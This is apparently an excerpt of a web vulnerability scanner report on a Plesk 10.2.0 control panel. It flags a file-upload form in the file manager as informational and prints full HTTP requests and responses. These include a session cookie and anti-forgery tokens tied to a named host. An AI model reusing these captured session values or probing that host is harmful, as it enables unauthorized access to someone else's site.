<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Ffile-manager%252F%253Fcmd%253Dchdir%2526file%253D%252Fhttpdocs%26src%3D%252Fsmb%252Fweb%252Fview%252Fid%252F1%252FsiteId%252F1%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>SSL Certificates</span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.certificate/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

       function send_cert_oC(f)
       {
           if (f.cert_f.value == "") {
               alert("Select a certificate file");
               f.cert_f.focus();
               return false;
           }
           f.cmd.value="find";
           lsubmit(f);
           return false;
       }

       function demo()
       {
           alert("This function is not available in the demo version.");
       }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/certificate@" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f">
   <input type="hidden" name="cmd" value="setFilter">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <p>SSL certificates are used for securing transfer of sensitive data sent to your website by its visitors, and for verifying the site identity.</p>
<p>After adding an SSL certificate to a domain, you need to enable SSL support and select that certificate in the website hosting settings.</p>

<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-cert-add" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Add a new SSL certificate.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/certificate@new/properties/&#039;); return false;" style=""><BUTTON name="bname_cert_add" id="buttonid-cert-add" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/certificate@new/properties/&#039;); return false;">Add SSL Certificate</BUTTON><SPAN id="spanid-cert-add">Add SSL Certificate</SPAN></DIV>
           <DIV class="commonButton" id="bid-cert-view" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;View the list of SSL certificates that you purchased from your provider.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/mpc-certificates/&#039;); return false;" style=""><BUTTON name="bname_cert_view" id="buttonid-cert-view" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/mpc-certificates/&#039;); return false;">View Certificates</BUTTON><SPAN id="spanid-cert-view">View Certificates</SPAN></DIV>
           
       </div>

   </td></tr></table></fieldset>
</div>

<div class="formArea">
   <fieldset>
       <legend>Find the appropriate private key to a certificate</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <table class="formFields" width="100%" cellspacing="0" >
           <tr>
               <td class="name"><label for="fid-cert_f">Certificate</label></td>
               <td><input type="file" id="fid-cert_f" name="cert_f"></td>
           </tr>
       </table>

       <div class="formButtons">
           <DIV class="commonButton" id="bid-send-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Find the appropriate private key for the uploaded certificate.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return send_cert_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_send_file" id="buttonid-send-file" type="button" onClick="Event.stop(event);return send_cert_oC(document.forms[0]);return false;">Send File</BUTTON><SPAN id="spanid-send-file">Send File</SPAN></DIV>
       </div>

   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Certificates</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
           <script>
           function r(event)    { tooltip.set(event, [{"type":"string","string":"CSR part supplied."}]); }        // request
           function nr(event)    { tooltip.set(event, [{"type":"string","string":"CSR part not supplied."}]); }        // no request
           function p(event)    { tooltip.set(event, [{"type":"string","string":"Private key part supplied."}]); }    // private key
           function np(event)    { tooltip.set(event, [{"type":"string","string":"Private key part not supplied."}]); }    // no private key
           function c(event)    { tooltip.set(event, [{"type":"string","string":"Certificate part supplied."}]); }        // certificate
           function nc(event)    { tooltip.set(event, [{"type":"string","string":"Certificate part not supplied."}]); }    // no certificate
           function a(event)    { tooltip.set(event, [{"type":"string","string":"CA Certificate part supplied."}]); }    // ca certificate
           function na(event)    { tooltip.set(event, [{"type":"string","string":"CA Certificate part not supplied."}]); }    // no ca certificate
           function mo()    { tooltip.hide(); }                    // reset conhelp
           
           </script>
       <div class="paging pagingTop noList">No SSL certificates</div><div class="paging pagingBottom noList"></div><script>SetCookie("certificateslist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function CertificatesListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function CertificatesListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function CertificatesListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function CertificatesListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.CertificatesListSelectAll.checked;
                           CertificatesListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function CertificatesListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function CertificatesListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function CertificatesListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   CertificatesListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function CertificatesListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function CertificatesListSearchShow()
           {
               var sc = document.getElementById("CertificatesListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("CertificatesListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function CertificatesListSearchHide()
           {
               var sc = document.getElementById("CertificatesListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("CertificatesListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function CertificatesListRemove(f)
           {
               if (0 == CertificatesListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/certificate@";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>
</div>




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

9.5. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/create-file/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/create-file/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

POST /plesk/client@2/domain@1/hosting/file-manager/create-file/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&file=/httpdocs
Cache-Control: max-age=0
Origin: http://www.nosedivesailing.com:8880
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvcNELhCBJg408XAA
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard
Content-Length: 1138

------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="forgery_protection_token"

dc1721730e046f7e1de14c19e4a424be
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="cmd"

new_file
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="lock"

true
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="previous_page"


------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="wizaction"


------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="filter"


------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="page"

0
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="page_size"

25
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="sort"

name
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="file"


------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="subcmd"


------WebKitFormBoundaryvcNELhCBJg408XAA--

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:34:04 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:34:04 GMT
Connection: close
Content-Length: 23875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fftp-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fweb-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fanonymous-ftp%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager_new_file/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
